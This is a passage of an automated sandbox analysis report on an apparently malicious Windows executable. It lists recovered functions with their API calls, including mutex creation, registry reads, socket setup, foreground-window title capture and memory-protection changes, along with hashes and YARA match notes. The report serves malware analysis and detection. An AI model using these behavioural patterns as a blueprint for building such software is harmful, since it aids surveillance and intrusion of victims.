CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
GetLastError.KERNEL32 ref: 0040BEF1

Strings

Rmc-MKYDDH, xrefs: 0040BED7

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-MKYDDH
API String ID: 1925916568-2989027721
Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

Function 008710F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00871BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00871BF4
Part of subcall function 00871BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00871BFC
Part of subcall function 00871BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00871C07
Part of subcall function 00871BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00871C12
Part of subcall function 00871BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00871C1A
Part of subcall function 00871BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00871C22

Part of subcall function 00871B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00871BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0087136A
OleInitialize.OLE32 ref: 00871388
CloseHandle.KERNEL32(00000000,00000000), ref: 008B24AB

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 3094916012-0
Opcode ID: 69a6f3b6852603e7dbabef73c79ac5f47efdd0b6b47b236d9bb53efc3957020b
Instruction ID: e61e1a7da3dfdeb67dee1cf706f8a6371876a7f019a79475400496b6115d0942
Opcode Fuzzy Hash: 69a6f3b6852603e7dbabef73c79ac5f47efdd0b6b47b236d9bb53efc3957020b
Instruction Fuzzy Hash: F3718AB89793048FC798EF7DE845E953AE4FB8A344714822AE51AC7375EB3084C0AF41

Function 008DC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00873923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00873A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008DC259
KillTimer.USER32(?,00000001,?,?), ref: 008DC261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008DC270

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 92a4527dab1620ec7a0ddd43201411806b004c069b872953a3c22f5f37f928d5
Instruction ID: a9e79d0ba5d208b6222e70ebb32f17a294fbfd01fc835ded0d219930d8842807
Opcode Fuzzy Hash: 92a4527dab1620ec7a0ddd43201411806b004c069b872953a3c22f5f37f928d5
Instruction Fuzzy Hash: 7F319570904354AFEB329F648895BE7BBECEB06308F04059EE5DAD7241C7745A84DB51

Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
RegCloseKey.KERNEL32(?), ref: 0041255F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
RegCloseKey.KERNEL32(00000000), ref: 0041269D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8

Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
RegCloseKey.KERNEL32(?), ref: 00412500

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8

Function 0087DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0087DB7B
DispatchMessageW.USER32(?), ref: 0087DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0087DB9F
Sleep.KERNEL32(0000000A), ref: 0087DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 008C1CC9

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: ea2104fc91b5a5d5bfbe200253ed828e5cf0e1d278ad87e83801a5ae2e7be28e
Instruction ID: 40859b6b46dbb8702080f4511cd829add079b9fa21df7be944df86615e13ab82
Opcode Fuzzy Hash: ea2104fc91b5a5d5bfbe200253ed828e5cf0e1d278ad87e83801a5ae2e7be28e
Instruction Fuzzy Hash: FFF0FE716583449BEB30DB648C89FAA73B8FF45310F508A19F65AD30D0DB70E4889B16

Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409531

Strings

xAG, xrefs: 00409561

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: xAG
API String ID: 176396367-2759412365
Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98

Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959

Strings

@, xrefs: 0041A94F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95

Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00404212

Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277

CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18

Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7

Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37

__CxxThrowException@8.LIBVCRUNTIME ref: 00433E04

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID:
API String ID: 3476068407-0
Opcode ID: ea9a0109065f6f062d325e7f9d197c84639d6e2261854d4895ca6052a95baae4
Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
Opcode Fuzzy Hash: ea9a0109065f6f062d325e7f9d197c84639d6e2261854d4895ca6052a95baae4
Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041AC74
GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4

Function 0088FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0088FD1F

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 68870bf73b8cb021b221d8a62e4d88436834ab77e02426cc1d9ab34e1638c415
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B3310475A00109DBC718EF59D480969FBA2FF49304B2486A5EA09CF656D731EEC1CBC0

Function 01478B40 Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,01478E3B), ref: 01478B77

Memory Dump Source

Source File: 00000002.00000002.3741342627.0000000001476000.00000040.00000020.00020000.00000000.sdmp, Offset: 01476000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1476000_Graff.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d22b9a85897b0480d9ab334fdf9dd112e4d2d472da5a885669ef85cb46738ed0
Instruction ID: b7a746be0bd50eb7a4b59f3f45fccfb7efeecaa17518230e532326dacf885258
Opcode Fuzzy Hash: d22b9a85897b0480d9ab334fdf9dd112e4d2d472da5a885669ef85cb46738ed0
Instruction Fuzzy Hash: DC31E87490124ADFEB64DF58C888BEEB7B1FF48304F148599D90AAB355C730AA85CF54

Function 004106D3 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94

Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00434403,?), ref: 00446B31

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

Function 008A3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 008A3852

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 65ac1058a48f396e01113ee555e4161fd048bd4717102d8aa8208871d343ffee
Instruction ID: fac248d9e8c510c4528e025b37e5c2a4345c2675e436539844483d7a535785cf
Opcode Fuzzy Hash: 65ac1058a48f396e01113ee555e4161fd048bd4717102d8aa8208871d343ffee
Instruction Fuzzy Hash: 62E0E53110522457FA213B6A9C04F9A3648FF437B4F090130BC14D2D91DB58DE0182E1

Function 00872DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00872DC4

Part of subcall function 00876B57: _wcslen.LIBCMT ref: 00876B6A

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: ca80571ea76609366fe763f339a8a2464e2950e5d2d5a6d302d3e04483bd5385
Instruction ID: fbafb2d613c4712a8262dbec18b205853bccecb6237b541ac6ac6c7dd2cf22d6
Opcode Fuzzy Hash: ca80571ea76609366fe763f339a8a2464e2950e5d2d5a6d302d3e04483bd5385
Instruction Fuzzy Hash: 62E086726041245BCB10925C9C05FEA779DEB88790F044171FD09D7249D960ED808551

Function 00872B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00873837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00873908

Part of subcall function 0087D730: GetInputState.USER32 ref: 0087D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00872B6B

Part of subcall function 008730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0087314E

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
